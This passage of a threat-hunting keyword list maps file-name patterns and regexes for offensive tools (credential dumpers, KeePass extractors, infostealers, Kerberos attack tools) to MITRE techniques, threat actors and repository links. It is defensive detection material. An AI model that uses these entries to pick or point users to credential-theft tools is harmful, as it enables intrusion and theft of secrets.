T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16066" "*\KaynInject.h*",".{0,1000}\\KaynInject\.h.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","16067" "*\KaynLdr\KaynInject\*",".{0,1000}\\KaynLdr\\KaynInject\\.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","16068" "*\KaynLdr-main\*",".{0,1000}\\KaynLdr\-main\\.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","16069" "*\KaynStrike.cna*",".{0,1000}\\KaynStrike\.cna.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","16070" "*\KaynStrike\src\*",".{0,1000}\\KaynStrike\\src\\.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","16071" "*\KaynStrike-main*",".{0,1000}\\KaynStrike\-main.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","16072" "*\KCMTicketFormatter*",".{0,1000}\\KCMTicketFormatter.{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","0","N/A","N/A","7","1","37","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z","16073" "*\kcredentialprovider.log*",".{0,1000}\\kcredentialprovider\.log.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz log files","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","16074" "*\kdstab.exe*",".{0,1000}\\kdstab\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","16075" "*\KeeFarce.exe*",".{0,1000}\\KeeFarce\.exe.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","16076" "*\KeeFarceDLL.dll*",".{0,1000}\\KeeFarceDLL\.dll.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","16077" "*\KeePass.sln*",".{0,1000}\\KeePass\.sln.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of 
the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","16078" "*\keepass_discover.py*",".{0,1000}\\keepass_discover\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16079" "*\keepass_export.csv*",".{0,1000}\\keepass_export\.csv.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","16080" "*\keepass_trigger.py*",".{0,1000}\\keepass_trigger\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16081" "*\KeePassFox.csproj*",".{0,1000}\\KeePassFox\.csproj.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","16082" "*\KeePassFox.sln*",".{0,1000}\\KeePassFox\.sln.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","16083" "*\keeper\getCredskeeper1.h*",".{0,1000}\\keeper\\getCredskeeper1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16084" "*\keeper\getCredskeeper2.h*",".{0,1000}\\keeper\\getCredskeeper2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16085" "*\keeper\getCredskeeper3.h*",".{0,1000}\\keeper\\getCredskeeper3\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","16086" "*\KeePwn.py*",".{0,1000}\\KeePwn\.py.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret 
extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","16087" "*\KeePwn\keepwn\*",".{0,1000}\\KeePwn\\keepwn\\.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","16088" "*\KeePwn-0.3\*",".{0,1000}\\KeePwn\-0\.3\\.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","16089" "*\KeePwn-main\*",".{0,1000}\\KeePwn\-main\\.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","16090" "*\KeeTheft.config*",".{0,1000}\\KeeTheft\.config.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","16091" "*\KeeTheft.exe*",".{0,1000}\\KeeTheft\.exe.{0,1000}","offensive_tool_keyword","KeeTheft","executables for penetration testing Windows Active Directory 
environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16092" "*\KeeTheft.exe*",".{0,1000}\\KeeTheft\.exe.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","16093" "*\KeeTheft.exe*",".{0,1000}\\KeeTheft\.exe.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","N/A","private github repo","10","","N/A","","","","16094" "*\KeeTheft.exe*",".{0,1000}\\KeeTheft\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16095" "*\KeeTheft.INI*",".{0,1000}\\KeeTheft\.INI.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction 
of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","16096" "*\KeeThief.ps1*",".{0,1000}\\KeeThief\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","16097" "*\kekeo.exe*",".{0,1000}\\kekeo\.exe.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","16098" "*\kematian.exe*",".{0,1000}\\kematian\.exe.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github.com/Pirate-Devs/Kematian","1","0","N/A","N/A","10","","N/A","","","","16099" "*\Kematian\*Browser Data*",".{0,1000}\\Kematian\\.{0,1000}Browser\sData.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware 
(+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","16100" "*\Kematian\*Crypto Wallets*",".{0,1000}\\Kematian\\.{0,1000}Crypto\sWallets.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","16101" "*\Kematian\*Important Files*",".{0,1000}\\Kematian\\.{0,1000}Important\sFiles.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","16102" "*\Kematian\*Password Managers*",".{0,1000}\\Kematian\\.{0,1000}Password\sManagers.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","16103" "*\Kematian-Stealer\*",".{0,1000}\\Kematian\-Stealer\\.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from 
GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github.com/Pirate-Devs/Kematian","1","0","N/A","N/A","10","","N/A","","","","16104" "*\kerberoast.c*",".{0,1000}\\kerberoast\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","16105" "*\kerberoast.c*",".{0,1000}\\kerberoast\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","16106" "*\kerberoastables.txt*",".{0,1000}\\kerberoastables\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","16107" "*\kerberoasting.c*",".{0,1000}\\kerberoasting\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","16108" "*\KerberOPSEC.cs*",".{0,1000}\\KerberOPSEC\.cs.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","16109" "*\KerberOPSEC.sln*",".{0,1000}\\KerberOPSEC\.sln.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","16110" "*\Kerbeus-BOF\*",".{0,1000}\\Kerbeus\-BOF\\.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","16111" "*\kerbrute.py*",".{0,1000}\\kerbrute\.py.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","16112" "*\KernelTokens.sys*",".{0,1000}\\KernelTokens\.sys.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","16113" "*\KExecDD-main*",".{0,1000}\\KExecDD\-main.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","0","N/A","N/A","8","3","244","41","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z","16114" "*\keycap.log*",".{0,1000}\\keycap\.log.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","16115" "*\KeyCredentialLink.ps1*",".{0,1000}\\KeyCredentialLink\.ps1.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","16116" "*\KeyDump.log*",".{0,1000}\\KeyDump\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
